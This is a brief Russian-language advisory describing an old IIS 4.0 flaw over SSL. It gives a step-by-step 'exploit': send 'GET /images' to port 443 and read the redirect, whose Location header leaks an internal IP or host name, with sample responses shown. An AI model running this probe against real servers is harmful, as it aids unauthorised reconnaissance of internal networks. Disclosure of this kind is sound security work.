• Партнер

  • e-Synergies обнаружили и исследовали уязвимость в Internet Information Server. Успешная эксплуатация этой уязвимости может показать критическую внутреннюю информацию типа внутреннего IP адреса или внутреннего имени хоста.
    Информацию можно получить, соединяясь вручную с TCP/443 портом (SSL) (например, используя Perl (SSLeay)).

    Эксплоит: 

    1-Просматриваем интернет сайт, используя SSL броузер и находим любой каталог.
    К примеру: https://www.target.com/images/icon.gif 

    2-Используем совместимый SSL Perl сценарий, выполните следующую команду:  

    GET /images HTTP/1.0 (если не получится попробуйте HTTP/1.1)

    3- Результат должен выглядеть следующим образом: 

    HTTP/1.1 302 Object Moved 
    Location: https://192.168.1.10/images/ 
    Server: Microsoft-IIS/4.0 
    Content-Type: text/html 
    Content-Length: xxx 

    Или 

    HTTP/1.1 302 Object Moved 
    Location: https://netbiosname/images/ 
    Server: Microsoft-IIS/4.0 
    Content-Type: text/html 
    Content-Length: xxx

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии